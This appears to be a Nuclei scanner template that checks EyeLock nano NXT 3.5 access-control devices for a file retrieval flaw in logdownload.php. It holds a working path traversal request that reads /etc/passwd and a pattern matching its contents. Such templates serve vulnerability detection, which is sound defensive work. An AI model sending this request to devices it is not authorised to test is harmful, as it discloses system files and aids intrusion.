31 lines
1.0 KiB
YAML
31 lines
1.0 KiB
YAML
id: eyelock-nano-lfd
|
|
|
|
info:
|
|
name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
|
|
author: geeknik
|
|
severity: high
|
|
description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources.
|
|
reference:
|
|
- https://www.zeroscience.mk/codes/eyelock_lfd.txt
|
|
metadata:
|
|
max-request: 1
|
|
tags: iot,lfi,eyelock
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0:"
|
|
part: body
|
|
|
|
# digest: 4a0a00473045022032e52a55ea074d1260dcdd3cd9cca43408e1a518dfec633df2d5865351fd27a40221009f4d1d65699d6288cd8a54a263927849b4e093b88e3d61bb69fb0da42495cbc6:922c64590222798bb761d5b6d8e72950
|